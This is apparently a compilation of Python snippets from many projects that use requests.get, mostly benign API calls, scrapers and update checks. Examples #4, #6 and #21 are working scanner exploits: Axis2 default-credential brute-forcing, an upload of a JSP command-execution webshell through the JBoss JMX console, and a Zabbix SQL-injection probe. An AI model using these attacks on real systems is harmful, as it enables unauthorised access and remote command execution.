Example #1
    def sendMessage(self, msg, element=None):
        if element is None:
            return True
        basic_url = self._createUrl(self.c.host, self.c.port)

        if element.status in common.getCompletedStatuses():
            requests.get("%s/library/sections/%s/refresh" % (basic_url, self.c.section_select))
Example #2
def _xem_refresh(indexer_id, indexer):
    """
    Refresh data from xem for a tv show
    
    @param indexer_id: int
    """
    if indexer_id is None:
        return

    indexer_id = int(indexer_id)
    indexer = int(indexer)

    try:
        logger.log(
            u'Looking up XEM scene mapping for show %s on %s' % (indexer_id, sickbeard.indexerApi(indexer).name,),
            logger.DEBUG)
        data = requests.get("http://thexem.de/map/all?id=%s&origin=%s&destination=scene" % (
            indexer_id, sickbeard.indexerApi(indexer).config['xem_origin'],), verify=False).json()

        if data is None or data == '':
            logger.log(u'No XEM data for show "%s on %s", trying TVTumbler' % (
                indexer_id, sickbeard.indexerApi(indexer).name,), logger.MESSAGE)
            data = requests.get("http://show-api.tvtumbler.com/api/thexem/all?id=%s&origin=%s&destination=scene" % (
                indexer_id, sickbeard.indexerApi(indexer).config['xem_origin'],), verify=False).json()
            if data is None or data == '':
                logger.log(u'TVTumbler also failed for show "%s on %s". Giving up.' % (indexer_id, indexer,),
                           logger.MESSAGE)
                return None

        result = data
        if result:
            cacheDB = db.DBConnection('cache.db')
            cacheDB.action("INSERT OR REPLACE INTO xem_refresh (indexer, indexer_id, last_refreshed) VALUES (?,?,?)",
                           [indexer, indexer_id, time.time()])
            if 'success' in result['result']:
                cacheDB.action("DELETE FROM xem_numbering where indexer = ? and indexer_id = ?", [indexer, indexer_id])
                for entry in result['data']:
                    if 'scene' in entry:
                        cacheDB.action(
                            "INSERT INTO xem_numbering (indexer, indexer_id, season, episode, scene_season, scene_episode) VALUES (?,?,?,?,?,?)",
                            [indexer, indexer_id, entry[sickbeard.indexerApi(indexer).config['xem_origin']]['season'],
                             entry[sickbeard.indexerApi(indexer).config['xem_origin']]['episode'],
                             entry['scene']['season'], entry['scene']['episode']])
                    if 'scene_2' in entry:  # for doubles
                        cacheDB.action(
                            "INSERT INTO xem_numbering (indexer, indexer_id, season, episode, scene_season, scene_episode) VALUES (?,?,?,?,?,?)",
                            [indexer, indexer_id, entry[sickbeard.indexerApi(indexer).config['xem_origin']]['season'],
                             entry[sickbeard.indexerApi(indexer).config['xem_origin']]['episode'],
                             entry['scene_2']['season'], entry['scene_2']['episode']])
            else:
                logger.log(u'Failed to get XEM scene data for show %s from %s because "%s"' % (
                    indexer_id, sickbeard.indexerApi(indexer).name, result['message']), logger.DEBUG)
        else:
            logger.log(u"Empty lookup result - no XEM data for show %s on %s" % (
                indexer_id, sickbeard.indexerApi(indexer).name,), logger.DEBUG)
    except Exception as e:
        logger.log(u"Exception while refreshing XEM data for show " + str(indexer_id) + " on " + sickbeard.indexerApi(
            indexer).name + ": " + ex(e), logger.WARNING)
        logger.log(traceback.format_exc(), logger.DEBUG)
        return None
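The function is typically invoked with a show's indexer pair; a hedged sketch (the attribute names on the show object are assumptions, not taken from this snippet):

    _xem_refresh(show.indexerid, show.indexer)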
Example #3
    def getURL(self, url, post_data=None, headers=None):

        if not headers:
            headers = {}

        # Glype Proxies does not support Direct Linking.
        # We have to fake a search on the proxy site to get data
        if self.proxy.isEnabled():
            headers.update({'referer': self.proxy.getProxyURL()})

        try:
            if sickbeard.PROXY_SETTING:
                proxies = {
                    "http": sickbeard.PROXY_SETTING,
                    "https": sickbeard.PROXY_SETTING,
                }

                r = requests.get(url, headers=headers, proxies=proxies)
            else:
                r = requests.get(url, headers=headers)
        except (requests.exceptions.ConnectionError,
                requests.exceptions.HTTPError) as e:
            logger.log(
                u"Error loading " + self.name + " URL: " +
                str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
Example #4
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            try:
                url = domain+'/axis2/axis2-admin/'
                resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception as e:
                logging.error(e)
                continue
            if "axis_l.jpg" in resp.text and resp.status_code == 200:
                result.append('%s/axis2/axis2-admin/ >>>> Axis admin console found' % domain)
                flag_list=['Administration Page</title>','System Components','"axis2-admin/upload"','include page="footer.inc">','axis2-admin/logout']
                user_list=['axis','admin','manager','root']
                pass_list=['axis','axis2','123456','12345678','password','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
                for user in user_list:
                    for password in pass_list:
                        try:
                            login_url = domain+'/axis2/axis2-admin/login'
                            data = {'username':user, 'password':password, 'submit':'Login'}
                            resp = requests.post(login_url, data=data, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                        except Exception as e:
                            logging.error(e)
                            continue
                        for flag in flag_list:
                            if flag in resp.text:
                                result.append('%s >>>> 存在Axis弱口令%s:%s'%(domain,user,password))
            url = domain+"/axis2/axis2-web/HappyAxis.jsp"
            try:
                resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception as e:
                logging.error(e)
Example #5
File: base.py Project: xxbing123/Scanver
    def load(self):
        res = requests.get(
            self.url,
            allow_redirects=False,
            #proxies=self.proxy,
            #timeout=self.timeout,
            verify=False)
        self.headers = res.headers
        self.server = res.headers.get('Server', self.server)
        xpoweredby1 = res.headers.get('X-Powered-By', '')
        xpoweredby2 = self.findxpoweredby(res)
        self.xpoweredby = xpoweredby2 + '|' + self.xpoweredby if xpoweredby2 else xpoweredby1
        res = requests.get(
            self.url,
            #proxies=self.proxy,
            #timeout=self.timeout,
            verify=False)
        self.status_code = res.status_code
        self.title = ''.join(
            re.findall(r"<title>([\s\S]*?)</title>",
                       res.text.encode(res.encoding).decode('utf-8'), re.I))
        self.server = res.headers.get('Server', self.server)
        xpoweredby3 = res.headers.get('X-Powered-By', self.xpoweredby)
        xpoweredby4 = self.findxpoweredby(res)
        self.xpoweredby = xpoweredby4 + '|' + self.xpoweredby if xpoweredby4 else xpoweredby3 + '|' + self.xpoweredby

        if 'JSP' in self.xpoweredby:
            server = self.javaserver(self.scheme, self.netloc)
            self.server = server + '|' + self.server if server else res.headers.get(
                'Server')

        self.cmsver = '|'.join(list(CMS.load(self.url)))
Example #6
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            vul_url1 = domain + '/status?full=true'
            try:
                resp = requests.get(vul_url1, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                if resp.status_code == 200 and "Max processing time" in resp.text:
                    result.append('%s >>>> JBoss information disclosure vulnerability' % vul_url1)
            except Exception as e:
                logging.error(e)
            shell="""<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>"""
            vul_url2 = domain + "/jmx-console/HtmlAdaptor"
            shellcode=""
            name=random_str(5)
            for v in shell:
                shellcode+=hex(ord(v)).replace("0x","%")
            params = {"action":"invokeOpByName","name":"jboss.admin%3Aservice%3DDeploymentFileRepository","methodName":"store","argType":"java.lang.String","arg0":name+".war","argType":"java.lang.String","arg1":name,"argType":"java.lang.String","arg2":".jsp","argType":"java.lang.String","arg3":"shellcode","argType":"boolean","arg4":"True"}
            try:
                resp = requests.head(vul_url2, params=params, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                shell_url = "%s/%s.jsp"%(domain,name)
                resp = requests.get(shell_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                if "comments" in resp.text:
                    result.append('%s >>>> 存在Jboss getshell漏洞 %s'%(vul_url2,shell_url))
            except Exception as e:
                logging.error(e)
            login = ["/admin-console/login.seam","/jmx-console","/console/App.html"]
            for login_uri in login:
                try:
                    resp = requests.get(domain+login_uri, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                except Exception as e:
                    logging.error(e)
                    continue
                if "JBoss" in resp.text or resp.status_code == 401:
                        result.append('%s >>>> 存在Jboss管理口'%(domain+login_uri))
Example #7
    def getSearch(self, host):
        returns = []
        try:
            resp1 = requests.get(bing_api + host, timeout=TIME_OUT)
            resp2 = requests.get(baidu_api + host, timeout=TIME_OUT)
        except Exception as e:
            logging.error(e)
            return []
Example #8
def get_fb_pictures(fb_album_id):
    #Get all pictures from our album & parse the JSON code
    fb_photos_API_url = "https://graph.facebook.com/v2.6/" + fb_album_id + "/photos?access_token=" + fb_token
    fb_photos = requests.get(fb_photos_API_url).json()

    #Parse JSON and get all the urls of those pictures & send them to QML
    for i in range(0, len(fb_photos['data'])):
        fb_photo_id = fb_photos['data'][i]['id']
        fb_photo_API_url = "https://graph.facebook.com/v2.6/" + fb_photo_id + "?fields=source&access_token=" + fb_token
        fb_photo = requests.get(fb_photo_API_url)
        pyotherside.send('fb_photos', fb_photo.json())
Example #9
def checkGithub():

    # Get the latest commit available from github
    url = 'https://api.github.com/repos/%s/mylar/commits/%s' % (
        mylar.GIT_USER, mylar.GIT_BRANCH)
    logger.info('Retrieving latest version information from github')
    try:
        response = requests.get(url, verify=True)
        git = response.json()
        mylar.LATEST_VERSION = git['sha']
    except:
        logger.warn('Could not get the latest commit from github')
        mylar.COMMITS_BEHIND = 0
        return mylar.CURRENT_VERSION

    # See how many commits behind we are
    if mylar.CURRENT_VERSION:
        logger.fdebug('Comparing currently installed version [' +
                      mylar.CURRENT_VERSION +
                      '] with latest github version [' + mylar.LATEST_VERSION +
                      ']')
        url = 'https://api.github.com/repos/%s/mylar/compare/%s...%s' % (
            mylar.GIT_USER, mylar.CURRENT_VERSION, mylar.LATEST_VERSION)

        try:
            response = requests.get(url, verify=True)
            git = response.json()
            mylar.COMMITS_BEHIND = git['total_commits']
        except:
            logger.warn('Could not get commits behind from github')
            mylar.COMMITS_BEHIND = 0
            return mylar.CURRENT_VERSION

        if mylar.COMMITS_BEHIND >= 1:
            logger.info('New version is available. You are %s commits behind' %
                        mylar.COMMITS_BEHIND)
        elif mylar.COMMITS_BEHIND == 0:
            logger.info('Mylar is up to date')
        elif mylar.COMMITS_BEHIND == -1:
            logger.info(
                'You are running an unknown version of Mylar. Run the updater to identify your version'
            )

    else:
        logger.info(
            'You are running an unknown version of Mylar. Run the updater to identify your version'
        )

    return mylar.LATEST_VERSION
Example #10
def main(wf):
    try:
        token = wf.get_password('coda_token')

        def wrapper():
            return get_docs(token)

        docs = wf.cached_data('docs', wrapper, max_age=1)
        wf.logger.debug("%s docs cached" % len(docs['items']))

        filelist = []
        for f in os.listdir('icons'):
            os.remove('icons/%s' % f)  # remove existing icons in case an icon was removed

        for item in docs['items']:
            try:
                icon = requests.get(item['icon']['browserLink'])

                with open("icons/%s.png" % item['id'], 'wb') as iconFile:
                    iconFile.write(icon.content)
            except:
                pass  # silently fail if no icon found

        wf.store_data('error', 0)

    except PasswordNotFound:
        wf.logger.error("No API token saved")
Example #11
def exploit(URL, Thread):
    logger.process("Request "+URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
Example #12
    def _searchForElement(self, term="", id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == "de.lad1337.games")
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = "http://thegamesdb.net/api/GetGame.php?"
        if term and not id:
            payload["name"] = term
        else:
            payload["id"] = id
        # r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log("tgdb search url " + r.url)
        root = ET.fromstring(r.text.encode("utf-8"))

        baseImgUrlTag = root.find("baseImgUrl")
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator("Game"):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, self.progress.count))

        return rootElement
Example #13
    def addDownload(self, download):
        payload = {'apikey': self.c.apikey,
                   'name': download.url,
                   'nzbname': self._downloadName(download),
                   'mode': 'addurl',
                   'output': 'json'}

        cat = self._getCategory(download.element)
        if cat is not None:
            payload['cat'] = cat
        try:
            r = requests.get(self._baseUrl(), params=payload, verify=False)
        except:
            log.error("Unable to connect to Sanzbd. Most likely a timout. is Sab running")
            return False
        log("final sab url %s" % r.url, censor={self.c.apikey: 'apikey'})
        log("sab response code: %s" % r.status_code)
        log("sab response: %s" % r.text)
        log.info("NZB added to Sabnzbd")

        jsonSabResponse = r.json()
        if 'status' in jsonSabResponse:
            return jsonSabResponse['status']
        return False
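addDownload passes Sabnzbd's own status flag back to the caller, so call sites can branch on the result directly. A minimal usage sketch (the downloader instance and download object here are illustrative, not from the original project):

    if downloader.addDownload(download):
        log.info("NZB queued successfully")
    else:
        log.error("Sabnzbd rejected the NZB or was unreachable")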
Example #14
File: Sabnzbd.py Project: sinfuljosh/XDM
    def _getQueue(self):

        payload = {"apikey": self.c.apikey, "mode": "qstatus", "output": "json"}
        r = requests.get(self._baseUrl(), params=payload)
        response = r.json()
        self._queue = response["jobs"]
        return self._queue
Example #15
        def setGroupId(client, group_url):
            group_string = 'temptaking.ado.sg/group/'
            if group_url.startswith(group_string):
                group_url = 'https://' + group_url
            if group_url.startswith('https://' + group_string) or group_url.startswith('http://' + group_string):
                try:
                    req_text = str(requests.get(group_url).content.decode('utf-8'))
                except:
                    return 0
                if 'Invalid code' in req_text:
                    return -1

                def urlParse(text):
                    return text[text.find('{'):text.rfind('}') + 1]

                try:
                    parsed_url = json.loads(urlParse(req_text))
                except:
                    return -1
                client.groupName = parsed_url["groupName"]
                client.groupId = parsed_url["groupCode"]
                client.groupMembers = json.dumps(parsed_url["members"])
                client.put()
                return 1
            else:
                return -1
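setGroupId reports its outcome through the return value: 1 on success, 0 when the group page could not be fetched, and -1 for an invalid URL or an unparseable response. A short illustrative caller (variable names are assumptions, not from the original code):

    status = setGroupId(client, 'temptaking.ado.sg/group/SOMECODE')
    if status == 1:
        reply = 'Registered group "%s".' % client.groupName
    elif status == 0:
        reply = 'Could not reach the group page, please retry.'
    else:
        reply = 'That does not look like a valid group URL.'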
Example #16
def scrapeGameLink(link='http://sports.yahoo.com/nba/boston-celtics-trail-blazers-2014040922/', save_dir='../data/box_scores/', target_date=date.today()):


	TARGET_LINK = link
	SAVE_DIR = save_dir

	print "[STATUS] Downloading {0}".format(TARGET_LINK)
	r = requests.get(TARGET_LINK)

	if r.status_code != requests.codes.ok:
		print "ERROR: Request did not come back with OK status code"
		exit()

	raw_html = r.text

	box_score = YahooBoxScore(raw_html, TARGET_LINK, target_date)
	box_score.uploadToDB(db)
	home_team = box_score.home_team
	away_team = box_score.away_team
	game_date = box_score.game_date

	print "Game Date: {0}".format(game_date.strftime('%c'))
	print "{1} vs. {0}".format(away_team, home_team)


	FILENAME_CSV = "{0}_vs_{1}_{2}.csv".format(away_team, home_team, game_date.strftime('%d-%m-%Y'))
	FILENAME_JSON = "{0}_vs_{1}_{2}.json".format(away_team, home_team, game_date.strftime('%d-%m-%Y'))

	RELATIVE_PATH = SAVE_DIR+FILENAME_CSV



	print "[STATUS] Saving {0}".format(RELATIVE_PATH)

	flushStatsToCSV(box_score.player_stats, SAVE_DIR + FILENAME_CSV)
Example #17
def fetchURL(URL, headers=None, retry=True):
    """ Return the result of fetching a URL and True if success
        Otherwise return error message and False
        Allow one retry on timeout by default"""

    if headers is None:
        # some sites insist on having a user-agent, default is to add one
        # if you don't want any headers, send headers=[]
        headers = {'User-Agent': USER_AGENT}
    proxies = proxyList()
    try:
        timeout = check_int(lazylibrarian.CONFIG['HTTP_TIMEOUT'], 30)
        r = requests.get(URL, headers=headers, timeout=timeout, proxies=proxies)

        if str(r.status_code).startswith('2'):  # (200 OK etc)
            return r.content, True
        return "Response status %s: %s" % (r.status_code, r.content), False
    except requests.exceptions.Timeout as e:
        if not retry:
            logger.error(u"fetchURL: Timeout getting response from %s" % URL)
            return "Timeout %s" % str(e), False
        logger.debug(u"fetchURL: retrying - got timeout on %s" % URL)
        result, success = fetchURL(URL, headers=headers, retry=False)
        return result, success
    except Exception as e:
        if hasattr(e, 'reason'):
            return "Exception %s: Reason: %s" % (type(e).__name__, str(e.reason)), False
        return "Exception %s: %s" % (type(e).__name__, str(e)), False
Example #18
    def init(self):

        super(Itasa, self).init()
        login_pattern = '<input type="hidden" name="return" value="([^\n\r\t ]+?)" /><input type="hidden" name="([^\n\r\t ]+?)" value="([^\n\r\t ]+?)" />'

        response = requests.get(self.server_url + 'index.php')
        if response.status_code != 200:
            raise ServiceError('Initiate failed')

        match = re.search(login_pattern, response.content,
                          re.IGNORECASE | re.DOTALL)
        if not match:
            raise ServiceError('Can not find unique id parameter on page')

        login_parameter = {
            'username': '******',
            'passwd': 'subliminal',
            'remember': 'yes',
            'Submit': 'Login',
            'option': 'com_user',
            'task': 'login',
            'silent': 'true',
            'return': match.group(1),
            match.group(2): match.group(3)
        }

        self.session = requests.session()
        r = self.session.post(self.server_url + 'index.php',
                              data=login_parameter)
        if not re.search('logouticon.png', r.content,
                         re.IGNORECASE | re.DOTALL):
            raise ServiceError('Itasa Login Failed')
Example #19
File: prove.py Project: rahulworld/istsos2
def services_name_operations_getobservation_offerings_name_procedures_GET(pp):
    print "services/{name}/operations/getobservation/offerings/{name}/procedures/..., GET"

    dbname = 'demo'
    oname = 'temporary'
    pname = 'BELLINZONA'
    obprop = 'urn:ogc:def:parameter:x-istsos:1.0:meteo:air:temperature'
    start = '2013-01-01T00:10:00.000000+0100'
    end = '2013-01-05T00:00:00.000000+0100'

    res = requests.get('http://localhost/istsos/wa/istsos/services/' + dbname +
                       '/operations/getobservation/offerings/' + oname +
                       '/procedures/' + pname + '/observedproperties/' +
                       obprop + '/eventtime/' + start + '/' + end,
                       prefetch=True)

    try:
        res.raise_for_status()  # raise an exception if some communication error occurred
    except Exception as e:
        print str(e)

    pp.pprint(res.json)

    print "\n ************************************ \n"
Example #20
    def init(self):
       
        super(Itasa, self).init()
        login_pattern = '<input type="hidden" name="return" value="([^\n\r\t ]+?)" /><input type="hidden" name="([^\n\r\t ]+?)" value="([^\n\r\t ]+?)" />'

        response = requests.get(self.server_url + 'index.php')
        if response.status_code != 200:
            raise ServiceError('Initiate failed')
        
        match = re.search(login_pattern, response.content, re.IGNORECASE | re.DOTALL)
        if not match:
            raise ServiceError('Can not find unique id parameter on page')
        
        login_parameter = {'username': '******',
                           'passwd': 'subliminal',
                           'remember': 'yes',
                           'Submit': 'Login',
                           'option': 'com_user',
                           'task': 'login',
                           'silent': 'true',
                           'return': match.group(1), 
                            match.group(2): match.group(3)
                          }

        self.session = requests.session()
        r = self.session.post(self.server_url + 'index.php', data=login_parameter)
        if not re.search('logouticon.png', r.content, re.IGNORECASE | re.DOTALL):
            raise ServiceError('Itasa Login Failed')
Example #21
def exploit(ip):
    result = []
    weakfile = [
        ['/containers/json','HostConfig'],
        ['/spaces/viewdefaultdecorator.action?decoratorName=/','log4j.properties'],
        ['/_cat','/_cat/master'],
        ['/.git/config','repositoryformatversion'],
        ['/.svn/all-wcprops','svn:wc:ra_dav:version-url'],
        ['/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x36),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17','c5a880faf6fb5e6087eb1b2dc'],
        ['/otua*~1.*/.aspx','400']
    ]
    if Domain:
        for domain in Domain:
            for i in weakfile:
                url = domain+i[0]
                try:
                    resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                except Exception as e:
                    logging.error(e)
                    continue
                if i[1].isdigit():
                    if resp.status_code == int(i[1]):
                        result.append('%s >>>> 存在弱点文件'%url)
                else:
                    if i[1] in resp.text:
                        result.append('%s >>>> 存在弱点文件'%url)
        if len(result):
            return result
Example #22
    def get(self):
        response = requests.get("https://api.venmo.com/v1/me?access_token=" + self.request.get('access_token'))
        balance = response.json().get('data').get('balance')

        payload = {}
        payload['balance'] = balance
        self.response.write(json.dumps(payload))
Example #23
def find_download(clientAgent, download_id):
    tc = create_torrent_class(clientAgent)

    logger.debug("Searching for Download on %s ..." % (clientAgent))
    if clientAgent == 'utorrent':
        torrents = tc.list()[1]['torrents']
        for torrent in torrents:
            if download_id in torrent:
                return True
    if clientAgent == 'transmission':
        torrents = tc.get_torrents()
        for torrent in torrents:
            torrent_hash = torrent.hashString
            if torrent_hash == download_id:
                return True
    if clientAgent == 'deluge':
        pass
    if clientAgent == 'sabnzbd':
        baseURL = "http://%s:%s/api" % (nzbtomedia.SABNZBDHOST, nzbtomedia.SABNZBDPORT)
        url = baseURL
        params = {}
        params['apikey'] = nzbtomedia.SABNZBDAPIKEY
        params['mode'] = "get_files"
        params['output'] = 'json'
        params['value'] = download_id
        try:
            r = requests.get(url, params=params)
        except requests.ConnectionError:
            logger.error("Unable to open URL")
            return 1  # failure

        result = r.json()
        if result['files']:
            return True
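A sketch of a typical call, checking whether a finished download is still known to the configured client (download_id would be a torrent info-hash or a Sabnzbd job id, depending on the agent):

    if find_download('sabnzbd', download_id):
        logger.debug("Download is still present in the client")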
Example #24
    def _getMovieWatchlist(self, username, password, apikey):
        url = self._makeURL(movieWatchlistURL, apikey, username)
        try:
            r = requests.get(url, auth=(username, self._hash(password)))
            return r.json()
        except:
            return []
Example #25
    def search(cls, artist_name, album_name=None):
        search_query = artist_name + " " + album_name if album_name else artist_name
        params = {
            "search": search_query,
            "catid": cls.categories["all"],
            "num": cls.max_results,
            "username": config.nzbmatrix.username,
            "apikey": config.nzbmatrix.api_key,
        }
        request = requests.get(cls.search_url, params=params)
        results = cls.parse_search_results(request.content)

        return results

    @staticmethod
    def parse_search_results(result_content):
        results = []
        result_chunks = re.split("\\n|\\n", result_content)

        for result in result_chunks:
            result_lines = result.split("\n")
            result_dict = {}

            for line in result_lines:
                key = re.findall("^(.+):", line)[0]
                value = re.findall(":(.+);$", line)[0]
                result_dict[key] = value.lower()

            results.append(result_dict)

        return results
Example #26
    def _response(self):
        if not self._cached_response:
            if not self._check_user_agent():
                raise UserAgentError("Invalid or no User-Agent set.")
            self._cached_response = requests.get(self._uri, params=self._params, headers=self._headers)

        return self._cached_response
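Because the response is memoized in self._cached_response, the HTTP request is issued at most once per object; later calls reuse the first response. Illustratively (assuming api is an instance of the surrounding class):

    first = api._response()   # performs the actual requests.get
    second = api._response()  # returned from the cache, no new request
    assert first is second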
Example #27
    def _searchForElement(self, term='', id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == 'de.lad1337.games')
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = 'http://thegamesdb.net/api/GetGame.php?'
        if term and not id:
            payload['name'] = term
        else:
            payload['id'] = id
        #r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log('tgdb search url ' + r.url)
        root = ET.fromstring(r.text.encode('utf-8'))

        baseImgUrlTag = root.find('baseImgUrl')
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator('Game'):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, len(list(rootElement.children))))

        return rootElement
Example #28
def pullsearch(comicapi, comicquery, offset, explicit, type):
    u_comicquery = urllib.quote(comicquery.encode('utf-8').strip())
    u_comicquery = u_comicquery.replace(" ", "%20")

    if explicit == 'all' or explicit == 'loose':
        PULLURL = mylar.CVURL + 'search?api_key=' + str(comicapi) + '&resources=' + str(type) + '&query=' + u_comicquery + '&field_list=id,name,start_year,first_issue,site_detail_url,count_of_issues,image,publisher,deck,description,last_issue&format=xml&page=' + str(offset)

    else:
        # 02/22/2014 use the volume filter label to get the right results.
        # add the 's' to the end of type to pluralize the caption (it's needed)
        if type == 'story_arc':
            u_comicquery = re.sub("%20AND%20", "%20", u_comicquery)
        PULLURL = mylar.CVURL + str(type) + 's?api_key=' + str(comicapi) + '&filter=name:' + u_comicquery + '&field_list=id,name,start_year,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&offset=' + str(offset) # 2012/22/02 - CVAPI flipped back to offset instead of page
    #all these imports are standard on most modern python implementations
    #logger.info('MB.PULLURL:' + PULLURL)

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(PULLURL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception as e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
Example #29
def storyarcinfo(xmlid):

    comicLibrary = listLibrary()

    arcinfo = {}

    if mylar.COMICVINE_API == 'None' or mylar.COMICVINE_API is None or mylar.COMICVINE_API == mylar.DEFAULT_CVAPI:
        logger.warn('You have not specified your own ComicVine API key - a lot of things will be limited. Get your own @ http://api.comicvine.com.')
        comicapi = mylar.DEFAULT_CVAPI
    else:
        comicapi = mylar.COMICVINE_API

    #respawn to the exact id for the story arc and count the # of issues present.
    ARCPULL_URL = mylar.CVURL + 'story_arc/4045-' + str(xmlid) + '/?api_key=' + str(comicapi) + '&field_list=issues,name,first_appeared_in_issue,deck,image&format=xml&offset=0'
    logger.fdebug('arcpull_url:' + str(ARCPULL_URL))

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(ARCPULL_URL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception as e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
Example #30
    def test_SNI_URLS(self):
        if not enabled_sni:
            print("\nSNI is disabled when the cryptography module is missing, you may encounter SSL errors!")
        else:
            for provider in [torrentday, rarbg, sceneaccess]:
                # print 'Checking ' + provider.name
                self.assertEqual(requests.get(provider.url).status_code, 200)
Example #31
File: mb.py Project: ChapeLu/mylar
def storyarcinfo(xmlid):

    comicLibrary = listLibrary()

    arcinfo = {}

    if mylar.COMICVINE_API == 'None' or mylar.COMICVINE_API is None or mylar.COMICVINE_API == mylar.DEFAULT_CVAPI:
        logger.warn('You have not specified your own ComicVine API key - a lot of things will be limited. Get your own @ http://api.comicvine.com.')
        comicapi = mylar.DEFAULT_CVAPI
    else:
        comicapi = mylar.COMICVINE_API

    #respawn to the exact id for the story arc and count the # of issues present.
    ARCPULL_URL = mylar.CVURL + 'story_arc/4045-' + str(xmlid) + '/?api_key=' + str(comicapi) + '&field_list=issues,name,first_appeared_in_issue,deck,image&format=xml&offset=0'
    logger.fdebug('arcpull_url:' + str(ARCPULL_URL))

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(ARCPULL_URL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception as e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
Example #32
def request_memberlist():
    """
    Requests the list of TFS members to update hiscores for, specifically from 
    the Google Sheet "TFS Hiscores - Data/db-memberlist".

    Parses list into $rsn_list global and returns it.
    """
    log('Retrieving memberlist...')
    gdoc_url_base   = 'https://docs.google.com/spreadsheet/pub?output=csv&key='
    gdoc_url = gdoc_url_base + gdoc_url_key + '&output=csv#gid=62'
    log('Attempting to retrieve memberlist from %s' % gdoc_url)
    gdoc_response = requests.get(gdoc_url)
    gdoc_contents = gdoc_response.content
    
    if gdoc_response.status_code != 200:
        terminate('Received status code %d on memberlist retrieval.'
                    % gdoc_response.status_code)

    log('Memberlist successfully retrieved')
    global rsn_list ## Must include global declaration to modify it
    rsn_list = [rsn for rsn in gdoc_contents.splitlines() if len(rsn) > 0]
    ## Ignore blank entries; we know there is at least one because the first
    ## entry should always be blank because the GDoc needs a blank header to
    ## to sort (alphabetize) the memberlist.

    return rsn_list
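Per the docstring, the returned list is the set of member names whose hiscores should be refreshed; a sketch of the intended call pattern (update_hiscores is a hypothetical consumer):

    for rsn in request_memberlist():
        update_hiscores(rsn)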
Example #33
def exploit(URL, Thread):
    logger.process("Request " + URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
Example #34
def findvideos(item):
    logger.info("pelisalacarta.channels.areadocumental findvideos")
    itemlist = []
    data = requests.get(item.url).text

    subs = scrapertools.find_multiple_matches(
        data, 'file: "(/webvtt[^"]+)".*?label: "([^"]+)"')

    patron = 'file: "http://217.160.176.9/comun/videos/([^"]+)".*?label: "([^"]+)"'
    matches = scrapertools.find_multiple_matches(data, patron)
